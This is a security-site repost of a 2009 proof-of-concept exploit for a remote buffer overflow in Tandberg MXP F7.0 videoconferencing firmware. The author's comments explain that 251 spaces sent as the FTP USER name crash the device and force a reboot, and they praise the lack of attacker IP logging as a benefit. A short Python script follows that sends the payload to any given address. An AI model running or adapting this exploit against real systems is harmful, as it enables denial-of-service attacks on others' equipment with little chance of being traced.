首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC
来源:www.vfcocus.net 作者:otokoyama 发布时间:2009-07-14  
#########################################################################################
# #
# TANDBERG BoF v0.1 - Tandberg MXP F7.0<                                                #
# Buffer Overflow Vulnerability PoC                                                     #
# By otokoyama                                                                          #
#                                                                                       #
# [+] We crash the process FtpCt00 by sending a 251 char string of /x20 commonly        #
#     known as a blank space.(very simple) #
# [+] The BOF happens due to the system passing all usernames:passwords to a log file.  #
#                                                                                       #
# [+] Vendor has fixed THIS in the later releases of its firmware so it is now public.  #
#     #
#                                                                 #
# This is a good vuln due to the system not logging the IP address of the attacker.     #
# To be able to tell who was causing this you would need to grab a log from the FW      #
# and as TANDBERG does not provide timestamps on their endpoints pre f8.0               #
# you would need to have recieved a SNMP notification to TMS that the system rebooted   #
# and cross reference that with the IP's connecting through the firewall.    #
# This is particularily annoying due to the fact that systems reboot all the time #
# As endusers are constantly turning them on\off #
# At this point the sysadmin goes "TANDBERG Can we buy an Expressway?"        #
#         #
# As far as it goes, creating a connectback shell would be difficult                    #
# this is mainly due to the process on the Endpoint that detects a memory mismatch      #
# and subsequently reboots the system(security measure).                                #
#                                                                                       #
# To create a successfull exploit outside of the DoS                                    #
# you would need to locate the memory address of the process that reboots the system    #
# (there might even be a fallback on that) This is generally too cumbersome as          #
# this embeded system doesn't do anything fun anyway (why would you want access)        #
#                                                                                 #
# In saying that,                                                                       #
# it would be fairly trivial to use the BoF to write something to the memory.           #
# you will notice buffer below only generates the exception 0x0200 aka Machine Check.   #
# Increasing the char sent to the unit will change that error to exception 0x1100       #
# meaning we are sending the MINIMUM required length to overflow the buffer.            #
# I have done the hardwork for you! Please email me if you get some encodes.  #
# BTW, This could be done like this:                                                    #
# from ftplib import FTP                                                                #
# ftp = FTP('ip.addr')                                                                  #
# ftp.login(' '*251)                                                                    #
# ftp.quit()....but its dirty.                                                 #
#                                         #
# shoutouts:mabus,gso                                                                   #
#########################################################################################

import socket
import struct
import time
import sys


buff='USER '+' '*251+'\r\n'

if len(sys.argv)!=3:
print "\n[+] Usage: %s <ip> <port>"%sys.argv[0]
print "[-] Example: python poc.py 192.168.1.23 23\n"
sys.exit(0)

try:

        print "[+] Connecting... %s" %sys.argv[1]
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((sys.argv[1],int(sys.argv[2])))
print "[+] Sending data..."
time.sleep(1.2)
s.send(buff)
        print "[+] Deed Done"
        s.recv(1024)

except:
print "[#] Unable to connect"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RunCMS <= 1.6.3 (double ext) R
·ScITE Editor 1.72 Local Crash
·Photo DVD Maker Pro versions 8
·FreeBSD 6/8 (ata device) Local
·Pirch IRC 98 Client (response)
·Openswan <= 2.4.12/2.6.16 Inse
·d.net CMS Arbitrary Reinstall/
·Mp3-Nator 2.0 (ListData.dat) U
·Playlistmaker 1.5 (.M3U/M3L/T
·Mozilla Firefox 3.5 Remote Buf
·M3U/M3L to ASX/WPL 1.1 (ASX,M
·FotoFlexer suffers from a remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved